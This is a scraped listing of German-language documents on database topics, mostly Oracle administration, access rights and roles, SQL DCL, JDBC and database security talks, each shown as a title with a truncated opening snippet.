Entwicklungsumgebung für die Übung VU Datenbanksysteme Wolfgang Fischl Arbeitsbereich Datenbanken und Artificial Intelligence Institut für Informationssysteme Technische Universität Wien Wintersemester
MehrÜBER RECHTE/ROLLEN UND DEN SICHEREN BETRIEB DER DATENBANK
DOAG Konferenz 20.11.2018 Die Anwender in der DB im Zaum halten ÜBER RECHTE/ROLLEN UND DEN SICHEREN BETRIEB DER DATENBANK Seite 1 GPI Consult Gunther Pippèrr gunther@pipperr.de Mein Blog https://www.pipperr.de/dokuwiki/
Mehr3.17 Zugriffskontrolle
3. Der SQL-Standard 3.17. Zugriffskontrolle Seite 1 3.17 Zugriffskontrolle Datenbanken enthalten häufig vertrauliche Informationen, die nicht jedem Anwender zur Verfügung stehen dürfen. Außerdem wird man
MehrFlexible und automatisierte Reaktionen auf Sicherheitsvorfälle
Flexible und automatisierte Reaktionen auf Sicherheitsvorfälle Franz Huell Enterprise Technology Specialist, EMEA Select GETDATE () select SYSDATE select CURDATE () select CURRENT DATE: 29-oct-2014 Vorstellung
Mehr6 Sicherheitskonzepte in Oracle
6 Sicherheitskonzepte in Oracle Datenbanksysteme sind für viele Benutzer(-gruppen) mit unterschiedlichen Nutzungswünschen geschaffen, aber nicht alle Daten des Informationssystems sind für alle Benutzer
MehrHistorisierung und Versionierung
DOAG NRW-Regionaltreffen 7. Juli 2005, Aachen Historisierung und Versionierung für ein bestehendes Datenmodell ohne Änderung der Anwendung Martin Friemel, Martin Kubitza Enterprise Web AG, Duisburg fon
Mehr7 DCL (Data Control Language)
7 DCL (Data Control Language) 7 In diesem Kapitel werden wir die der SQL-Befehle für Transaktionen und für die Vergabe von Privilegien kennen lernen. Eine der wichtigsten Eigenschaften einer Datenbank
MehrJohannes Ahrends CarajanDB GmbH CarajanDB GmbH
Johannes Ahrends CarajanDB GmbH Experten mit über 20 Jahren Oracle Erfahrung Firmensitz in Erftstadt bei Köln Spezialisten für Oracle Datenbank Administration Hochverfügbarkeit (RAC, Data Guard, Failsafe,
MehrMultimedia im Netz Wintersemester 2013/14. Übung 02 (Hauptfach)
Multimedia im Netz Wintersemester 2013/14 Übung 02 (Hauptfach) Ludwig-Maximilians-Universität München Multimedia im Netz WS 2013/14 - Übung 2-1 PHP und MySQL Es werden mehrere APIs von PHP angeboten um
MehrOracle SQL. Seminarunterlage. Version vom
Seminarunterlage Version: 12.16 Version 12.16 vom 12. Oktober 2017 Dieses Dokument wird durch die veröffentlicht.. Alle Rechte vorbehalten. Alle Produkt- und Dienstleistungs-Bezeichnungen sind Warenzeichen
MehrOracle 10g Einführung
Kurs Oracle 10g Einführung Teil 5 Einführung Timo Meyer Administration von Oracle-Datenbanken Timo Meyer Sommersemester 2006 Seite 1 von 16 Seite 1 von 16 Agenda 1 Tabellen und Views erstellen 2 Indizes
MehrIst die Standard Edition noch einsetzbar? Dierk Lenz DOAG 2015 Konferenz
Ist die Standard Edition noch einsetzbar? Dierk Lenz DOAG 2015 Konferenz Herrmann & Lenz Services GmbH Herrmann & Lenz Solutions GmbH Erfolgreich seit 1996 am Markt Firmensitz: Burscheid (bei Leverkusen)
MehrOracle Developer Monthly Datenbank-Update für Anwendungsentwickler
Oracle Developer Monthly Datenbank-Update für Anwendungsentwickler Einwahl in die Telefonkonferenz 0800 6648515 oder +49 69 222216106 Conference Code: 9969115 Meeting Passcode: 06062014 Carsten Czarski
MehrKapitel 10. JDBC und SQLJ. Prof. Dr. Wolfgang Weber Vorlesung Datenbanken 1
Kapitel 10 JDBC und SQLJ 1 JDBC und SQLJ Bisher: Einbettung von SQL (statisch bzw. dynamisch) in C, C++, COBOL, ADA (embedded SQL) bzw. prozedurale Erweiterungen für SQL in Oracle (PL/SQL) Was ist mit
MehrPerformance für Oracle Anwendungen nicht nur für Oracle 11g
nicht nur für Herrmann & Lenz Services GmbH 21. November 2007 Die Firma Herrmann & Lenz wurde 1995 gegründet und hat aktuell 10 Mitarbeiter. Firmensitz: Burscheid (bei Köln). Beratung, Schulung und Fernwartung
MehrOracle Security Technology Day: Oracle Security - Trends und Ausblick für 2009
Oracle Security Technology Day: Oracle Security - Trends und Ausblick für 2009 Alexander Kornbrust - Red-Database-Security GmbH Oracle Security Technology Days - Frankfurt / Berlin 1 1 Inhalt Neue Arten
MehrVerwendung und Einsatzmöglichkeiten des Flashback-Query
DOAG-Präsentation Nov. 2002 Verwendung und Einsatzmöglichkeiten des Flashback-Query 1 Facts & Figures Über 300 Mitarbeiter Über 340 Kunden (ohne Schulung) Über 1000 Projekte 100 Service Level Agreements
MehrPraktikum: Datenbankprogrammierung in SQL/ORACLE. Zugriffsrechte an ORACLE-Account gekoppelt initial vom DBA vergeben SCHEMAKONZEPT
74 Zugriffsrechte BENUTZERIDENTIFIKATION Benutzername Password sqlplus /: Identifizierung durch UNIX-Account ZUGRIFFSRECHTE INNERHALB ORACLE Zugriffsrechte an ORACLE-Account gekoppelt initial vom DBA vergeben
Mehr